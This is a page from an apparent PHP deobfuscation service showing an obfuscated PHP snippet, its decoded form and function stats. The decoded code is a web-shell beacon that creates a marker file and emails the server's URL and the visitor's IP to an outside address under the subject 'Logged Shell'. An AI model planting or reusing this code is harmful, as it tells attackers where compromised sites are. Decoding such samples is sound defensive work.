Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if (!file_exists("\x61\160\x65\106\x31\170\x74\x53\143\70\163\62\x35\163\x6c\x32\61\x6d\1..
Decoded Output download
<? if (!file_exists("apeF1xtSc8s25sl21mkGfhL.txt")) { $file = fopen("apeF1xtSc8s25sl21mkGfhL.txt", "w"); fclose($file); $email_adress = "[email protected]"; $this_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; $message = "Path: {$this_path}"; if (mail($email_adress, "Logged Shell", $message, "[ " . $_SERVER["REMOTE_ADDR"] . " ]")) { } } ?>
Did this file decode correctly?
Original Code
if (!file_exists("\x61\160\x65\106\x31\170\x74\x53\143\70\163\62\x35\163\x6c\x32\61\x6d\153\x47\146\150\114\56\164\170\x74")) { $file = fopen("\x61\160\145\106\61\170\164\x53\143\x38\163\62\65\x73\x6c\62\x31\x6d\x6b\107\x66\x68\114\x2e\x74\x78\x74", "\167"); fclose($file); $email_adress = "\x6c\x6f\x67\x2e\146\151\156\x61\154\56\144\x65\163\164\151\x6e\x61\164\151\157\x6e\x40\147\155\141\151\x6c\x2e\143\157\155"; $this_path = "\x68\x74\x74\160\x3a\x2f\x2f" . $_SERVER["\123\105\x52\126\105\x52\x5f\x4e\x41\115\x45"] . $_SERVER["\122\105\x51\x55\x45\x53\x54\x5f\x55\x52\x49"]; $message = "\120\141\164\x68\72\x20{$this_path}"; if (mail($email_adress, "\114\157\147\147\x65\144\40\123\x68\x65\154\154", $message, "\133\40" . $_SERVER["\x52\105\115\x4f\124\105\137\101\x44\104\x52"] . "\x20\135")) { } }
Function Calls
1 | |
fopen | 1 |
fclose | 1 |
file_exists | 1 |
Stats
MD5 | 333d4e3fbffe7af0dca467206bf810f3 |
Eval Count | 0 |
Decode Time | 52 ms |